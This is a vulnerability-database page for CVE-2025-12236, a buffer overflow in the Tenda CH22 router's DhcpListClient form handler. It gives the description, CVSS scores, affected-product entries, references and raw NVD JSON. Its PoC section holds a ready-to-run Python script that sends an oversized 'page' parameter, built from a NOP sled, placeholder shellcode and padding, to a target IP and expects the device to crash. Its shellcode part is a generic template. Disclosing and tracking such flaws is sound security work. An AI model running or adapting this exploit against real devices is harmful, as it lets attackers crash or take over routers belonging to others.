CVE-2025-12236

Description

A vulnerability was determined in Tenda CH22 1.0.0.1. This issue affects the function fromDhcpListClient of the file /goform/DhcpListClient. This manipulation of the argument page causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ch22_firmware:1.0.0.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ch22:*:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda CH22 固件版本 1.0.0.1（其他版本可能也受影响，需进一步测试）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-12236 PoC - Tenda CH22 Buffer Overflow in /goform/DhcpListClient
Vulnerable function: fromDhcpListClient
Target: Tenda CH22 1.0.0.1
CVSS: 8.8 (High)
"""

import requests
import sys

TARGET = "http://{target_ip}"
PATH = "/goform/DhcpListClient"

def create_payload(length=1000):
    """Generate buffer overflow payload with NOP sled + shellcode"""
    # NOP sled for sliding to shellcode
    nop_sled = b'\x90' * 200
    # Placeholder for shellcode (actual shellcode depends on target architecture)
    shellcode = b'\xcc' * 100  # INT3 breakpoint for testing
    # Overflow pattern to reach return address
    overflow = b'A' * (length - len(nop_sled) - len(shellcode))
    return nop_sled + shellcode + overflow

def exploit(target_ip):
    """Send malicious request to trigger buffer overflow"""
    url = f"{TARGET.format(target_ip=target_ip)}{PATH}"
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-12236 PoC)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Payload for buffer overflow
    payload = {
        'page': create_payload(1000).decode('latin-1'),
        'fromDhcpListClient': '1'
    }
    
    print(f"[*] Targeting: {url}")
    print(f"[*] Payload length: {len(payload['page'])} bytes")
    print("[*] Sending exploit payload...")
    
    try:
        response = requests.post(url, data=payload, headers=headers, timeout=10)
        print(f"[+] Response status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed (device may be crashed): {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12236
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12236
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12236/
[4] VulDB https://vuldb.com/cve/CVE-2025-12236
[5] https://github.com/QIU-DIE/CVE/issues/17
[6] https://vuldb.com/?ctiid.329906
[7] https://vuldb.com/?id.329906
[8] https://vuldb.com/?submit.673724
[9] https://vuldb.com/?submit.721455
[10] https://www.tenda.com.cn/
[11] https://github.com/QIU-DIE/CVE/issues/17

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12236", "sourceIdentifier": "[email protected]", "published": "2025-10-27T07:15:38.813", "lastModified": "2026-02-24T08:16:23.520", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Tenda CH22 1.0.0.1. This issue affects the function fromDhcpListClient of the file /goform/DhcpListClient. This manipulation of the argument page causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ch22_firmware:1.0.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "DB66174F-9460-4B60-AC6B-1B8D5700D6A0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ch22:*:*:*:*:*:*:*:*", "matchCriteriaId": "9E4E8089-E529-4895-AD77-82A2458BA199"}]}]}], "references": [{"url": "https://github.com/QIU-DIE/CVE/issues/17", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329906", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329906", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673724", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721455", "source": "[email protected]"}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/QIU-DIE/ ... (truncated)